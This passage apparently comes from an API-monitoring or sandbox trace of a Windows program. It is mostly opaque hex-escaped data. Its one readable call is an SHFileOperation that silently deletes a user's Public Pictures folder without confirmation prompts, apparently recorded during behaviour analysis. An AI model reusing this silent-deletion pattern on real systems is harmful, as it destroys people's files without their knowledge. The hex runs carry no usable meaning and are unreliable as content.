xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Pictures\\Sample Pictures", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bf